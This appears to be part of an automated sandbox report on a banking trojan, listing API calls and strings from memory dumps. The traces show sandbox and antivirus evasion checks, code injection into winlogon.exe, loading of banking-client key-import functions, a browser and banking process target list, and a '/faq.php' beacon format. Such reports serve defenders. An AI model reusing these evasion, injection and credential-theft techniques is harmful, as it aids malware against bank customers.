                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02BC5A0B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02BC5A27
                                                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(02BFFB20), ref: 02BC5A42
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02BC5A6F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02BC5A7B
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02BC5A9A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02BC5AA6
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02BC5AC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02BC5AD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
                                                                                                                                                                                                            • String ID: .exe$69889606a$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$frd.exe$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
                                                                                                                                                                                                            • API String ID: 1248150503-3717161803
                                                                                                                                                                                                            • Opcode ID: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                            • Instruction ID: cd75bd8cc58f70b4831ba677a114415b8e6b007dcbdd572cc1aacb573b61f952
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e0cd89cfd34b965e37db1f9bff147307d11c219cd2b17d9c86010883a0569e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E91B171BC030576FA706AB55C8AFAA275C9F04F84FA044D8BB52F6091EBE4F5448B74
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4AED
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02BC4B27
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4B2E
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4B3E
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC4B5D
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02BC4BC2
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02BC4BE1
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02BC4C19
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02BC4C4A
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02BC4C5E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC4C7C
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02BC4C94
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02BC4CAA
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02BC4CCD
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02BC4D05
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BC4D2C
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000004,00000000,?,?,00000000), ref: 02BC4D4D
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BC4D66
                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4D70
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010,?,?,00000000), ref: 02BC4D83
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4D86
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4D9E
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02BC4DBB
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,?,?,00000000), ref: 02BC4DDC
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DEC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4DFB
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E0B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E14
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E1B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E2C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E33
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E41
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E44
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 02BC4E51
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BC4E54
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000004,?,?,00000000), ref: 02BC4E6A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 02BC4E7B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02BC4C58
                                                                                                                                                                                                            • GET, xrefs: 02BC4BF5
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02BC4C11
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02BC4BBD
                                                                                                                                                                                                            • 6a52c6225f6f323, xrefs: 02BC4C66
                                                                                                                                                                                                            • S:(ML;;NRNWNX;;;LW), xrefs: 02BC4D27
                                                                                                                                                                                                            • POST, xrefs: 02BC4BFE, 02BC4C17
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02BC4C42
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02BC4C6B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileHttpProcess$Request$Security$DescriptorFreeHeadersInternetmemset$HandleInfoOpenValidate$AllocAllocateCloseConnectConvertCreateInformationLocalLockNamedPointerQueryReadSaclSendStringUnlockWrite_snprintfmemcpy
                                                                                                                                                                                                            • String ID: 6a52c6225f6f323$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com$S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC6991
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02BC69C7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02BC69CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC69E3
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC69F2
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02BC6A06
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC6A2C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BC6A6A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BC6AA6
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02BC6ABB
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BC6AD3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BC6AE2
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC6AEF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B64
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC6B67
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6B74
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC6B77
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02BC6BED
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC6BF0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC6BFD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC6C00
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02BC6C0F
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BC6C1C
                                                                                                                                                                                                            • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02BF96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02BF96FC,00000001), ref: 02BC6C61
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                            • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00403A93
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                            • String ID: login$pass
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BC78B4
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: Process32First.KERNEL32(00000000,?), ref: 02BC78D9
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02BC78FD
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02BC7917
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: EnterCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC793B
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02BC7941
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02BC7948
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: LeaveCriticalSection.KERNEL32(02BFFB80,?,00000000), ref: 02BC7977
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02BC798B
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02BC79A5
                                                                                                                                                                                                              • Part of subcall function 02BC78A0: FindCloseChangeNotification.KERNEL32(00000000,?,00000000), ref: 02BC79B6
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02BC7A34
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7A58
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7A82
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7A94
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7A9F
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7AC4
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02BC7B2B
                                                                                                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02BC7B4C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BC7B70
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BC7B82
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80), ref: 02BC7B8D
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(02BFFB80), ref: 02BC7BB8
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C06
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC7C51
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(02BFFB80,?,?), ref: 02BC7C90
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02BC7C9A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC7CA1
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02BC7DB5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$OpenProcess32QueryTimesVirtual$AllocAllocateChangeCreateCurrentFindFirstNextNotificationSleepSnapshotToolhelp32
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • Part of subcall function 00401CF0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02BD5680: memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56B7
                                                                                                                                                                                                              • Part of subcall function 02BD5680: GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                              • Part of subcall function 02BD5680: SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                              • Part of subcall function 02BD5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                              • Part of subcall function 02BD5680: CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02BD4CFF
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02BD4D1E
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D53
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02BD4D5F
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02BD4D7A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02BD4D8A
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02BD4DC4
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02BD4DE5
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02BD4E11
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BD4E29
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02BD4E44
                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02BD4E52
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02BD4E7A
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4E8C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EA4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4EB5
                                                                                                                                                                                                            • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02BD4ED6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD4EF2
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4F03
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
